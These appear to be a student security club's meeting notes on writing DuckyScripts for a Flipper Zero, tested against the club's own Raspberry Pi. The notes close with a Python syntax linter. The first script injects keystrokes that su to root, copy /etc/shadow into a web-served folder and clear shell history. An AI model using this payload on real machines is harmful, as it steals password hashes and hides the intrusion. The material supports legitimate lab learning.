Red Team's Week 5 meeting, following the previous meeting's demo of a Rubber Ducky in action, worked through developing and writing a DuckyScript to be run against a Raspbian machine, delivered via the Bad USB functionality of a Flipper Zero.
The goal decided upon for this script was to steal user credentials by exfiltrating the shadow file.
The target system was a Raspberry Pi running an old version of the Raspbian OS owned by Patrick Hirsch. For the purpose of this exercise, we worked under the premise that the root user's password was somehow known to be 1, and that there was a web server running out of a directory on the system, ~hirschp2/Desktop.
Given this, the attack was deemed successful once the shadow file had been copied to the desktop.
With direct physical access to the target system, we worked out the commands that would achieve the desired outcome, and then the series of keystrokes needed to issue them.
With the steps the script must take figured out, we consulted the Hak5 DuckyScript Documentation to write a script to perform these actions, loaded it onto the Flipper, and tested it. The biggest hurdle was that CTRL ALT t (the space-separated modifier form) did not open the terminal window when run from the Flipper and had to be replaced with the hyphenated combination CTRL-ALT t, which is the form the Flipper's Bad USB documentation lists for modifier pairs. Beyond that, a few timing issues were resolved by adding DELAY commands where needed.
The final script seen below was successful in copying the device's shadow file to the user hirschp2's desktop, given the root user's password. Two caveats are worth noting for anyone reusing it: cp run as root without -p produces a copy owned by root with the source's 0640 mode, so a web server running as an unprivileged user cannot serve the file without a further chmod (the success criterion here was only that the copy existed), and history -c clears only the root shell's history, so the su root command still lands in hirschp2's own shell history.
REM TITLE Copy 'shadow' file to Desktop
REM AUTHOR Patrick, Sujal
REM DESCRIPTION Open a terminal, su to root, copy /etc/shadow to the user's Desktop
REM always include DELAY in beginning of script so it takes time to open up the terminal and between username and password prompt
DELAY 3000
REM open a terminal window (the hyphenated modifier form is the one the Flipper accepts)
CTRL-ALT t
DELAY 2000
STRING su root
ENTER
REM wait for the password prompt before typing the password
DELAY 2000
STRING 1
ENTER
STRING cp /etc/shadow ~hirschp2/Desktop
ENTER
REM clear the root shell's in-memory history before leaving it
STRING history -c
ENTER
STRING exit
ENTER
STRING exit
ENTER
The following day's meeting of the R&D Division reused the same meeting format, with members writing their own DuckyScript to download and open an image file.
The idea of writing a DuckyScript was well received, so the concept of a Rubber Ducky was briefly explained, the Nyan Cat script shown as an example, and the outcome of its previous demonstration on a campus machine recounted.
The group was then asked for an idea of what to write a script to do.
The goal decided upon for this script was to display an image of a rubber duck.
The target system was the same Raspberry Pi running an old version of the Raspbian OS owned by Patrick Hirsch. For the purpose of this exercise, the same assumptions as before still applied but were not needed. For this exercise, the Pi was also connected to the internet so it could download an image file.
With direct physical access to the target system, members worked out the commands that would achieve the desired outcome, and then the series of keystrokes needed to issue them. Because of a slight difficulty in finding a file format compatible with the default Image Viewer application, a suitable image was hosted on a student Sappho web server.
With the steps the script must take figured out, we consulted the Hak5 DuckyScript Documentation, wrote a script to perform these actions, and loaded it onto the Flipper. The first run failed due to a timing issue, which was quickly resolved by adding a DELAY command.
The final script seen below was successful in downloading and opening the specified image file.
REM TITLE Download and Open Image File
REM AUTHOR Sydney B, Kate Groemling
REM DESCRIPTION Open a terminal, download duck.PNG with wget and open it in the default image viewer
REM open a terminal window
CTRL-ALT t
REM give the terminal time to appear before typing into it
DELAY 1000
STRING wget https://nku.edu/~HirschP2/duck.PNG
ENTER
REM the shell runs wget to completion before reading the next buffered command, so no extra DELAY is needed here
STRING xdg-open duck.PNG
ENTER
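Both scripts above hit the same two problems on the Flipper: a space-separated modifier chain (CTRL ALT t) that its Bad USB parser does not accept, where the hyphenated CTRL-ALT does work, and keystrokes sent before the target was ready, fixed with DELAY. As an added example for these notes (not code from the meeting, from Hak5, or from Flipper Devices), the following small Python linter catches both before a script is copied to the Flipper. The command and key vocabulary it accepts is an assumption taken from the Flipper Bad USB documentation as recalled here; check it against the current docs before relying on it.

```python
"""Lint a DuckyScript before loading it onto a Flipper Zero (Bad USB).

Added example for these notes, not code from the meeting or from Hak5 or
Flipper Devices. The accepted command and key vocabulary below is an
assumption taken from the Flipper Bad USB documentation as recalled here;
verify it against the current docs before relying on it.
"""

# Commands the Flipper Bad USB parser understands (assumed set, see above).
COMMANDS = {
    "REM", "ID", "DELAY", "DEFAULT_DELAY", "DEFAULTDELAY", "STRING", "STRINGLN",
    "REPEAT", "HOLD", "RELEASE", "SYSRQ", "WAIT_FOR_BUTTON_PRESS",
    "STRING_DELAY", "DEFAULT_STRING_DELAY", "ALTCHAR", "ALTSTRING", "ALTCODE",
}
# Commands that take exactly one integer argument.
INT_ARG = {"DELAY", "DEFAULT_DELAY", "DEFAULTDELAY", "STRING_DELAY",
           "DEFAULT_STRING_DELAY", "REPEAT"}
MODIFIERS = {"CTRL", "CONTROL", "SHIFT", "ALT", "GUI", "WINDOWS"}
# Pre-baked two-modifier combinations; "CTRL ALT t" with a space is not one.
MODIFIER_COMBOS = {"CTRL-ALT", "CTRL-SHIFT", "ALT-SHIFT", "ALT-GUI",
                   "GUI-SHIFT", "GUI-CTRL"}
SPECIAL_KEYS = {
    "ENTER", "ESC", "ESCAPE", "TAB", "SPACE", "BACKSPACE", "DELETE", "INSERT",
    "HOME", "END", "PAGEUP", "PAGEDOWN", "UP", "UPARROW", "DOWN", "DOWNARROW",
    "LEFT", "LEFTARROW", "RIGHT", "RIGHTARROW", "CAPSLOCK", "NUMLOCK",
    "SCROLLLOCK", "PRINTSCREEN", "PAUSE", "BREAK", "MENU", "APP",
} | {f"F{i}" for i in range(1, 13)}
CANONICAL = {"CONTROL": "CTRL", "WINDOWS": "GUI"}


def _classify(token):
    if token in MODIFIER_COMBOS:
        return "combo"
    if token in MODIFIERS:
        return "modifier"
    if token in SPECIAL_KEYS or len(token) == 1:
        return "key"
    return "unknown"


def _suggest_combo(mods):
    """Return the hyphenated form of two modifiers if the Flipper has one."""
    names = [CANONICAL.get(m, m) for m in mods]
    for candidate in ("-".join(names), "-".join(reversed(names))):
        if candidate in MODIFIER_COMBOS:
            return candidate
    return None


def lint(script):
    """Return a list of (line_number, message) problems found in `script`."""
    issues = []
    delay_seen = False
    first_action_checked = False
    for lineno, raw in enumerate(script.splitlines(), 1):
        tokens = raw.split()
        if not tokens or tokens[0] in ("REM", "ID"):
            continue
        head = tokens[0]
        if head in INT_ARG:
            if len(tokens) != 2 or not tokens[1].isdigit():
                issues.append((lineno, f"{head} needs a single integer argument"))
            elif head == "DELAY":
                delay_seen = True
            continue
        # Anything from here on sends keystrokes to the target.
        if not first_action_checked:
            first_action_checked = True
            if not delay_seen:
                issues.append((lineno, "first keystroke has no preceding DELAY; "
                               "the host may still be enumerating the keyboard"))
        if head in COMMANDS:
            continue  # STRING, HOLD, etc.: payload text, nothing to check here
        kinds = [_classify(t) for t in tokens]
        if "unknown" in kinds:
            bad = [t for t, k in zip(tokens, kinds) if k == "unknown"]
            issues.append((lineno, "unrecognised command or key: " + ", ".join(bad)))
            continue
        mods = [t for t, k in zip(tokens, kinds) if k == "modifier"]
        keys = [t for t, k in zip(tokens, kinds) if k == "key"]
        if len(mods) + kinds.count("combo") > 1:
            combo = _suggest_combo(mods) if len(mods) == 2 else None
            hint = f"; write it as {combo} {' '.join(keys)}".rstrip() if combo else ""
            issues.append((lineno, "space-separated modifier chain is not accepted "
                           "by the Flipper parser" + hint))
        if len(keys) > 1:
            issues.append((lineno, "only one key may follow the modifiers"))
    return issues


def total_delay_ms(script):
    """Sum of explicit DELAY values: a lower bound on how long the Flipper must stay plugged in."""
    return sum(int(t[1]) for t in (line.split() for line in script.splitlines())
               if len(t) == 2 and t[0] == "DELAY" and t[1].isdigit())


if __name__ == "__main__":
    # Constructed sample: the variant that failed on the Flipper in Week 5.
    BROKEN = "REM demo\nCTRL ALT t\nSTRING su root\nENTER\n"
    for n, msg in lint(BROKEN):
        print(f"line {n}: {msg}")
```

Run it over the script text before copying the file to the badusb directory on the Flipper's SD card. The total_delay_ms figure is only a lower bound on how long the device has to stay plugged in, since typing time and any DEFAULT_DELAY are not counted, but it is a useful number to know before trying this anywhere other than a club meeting.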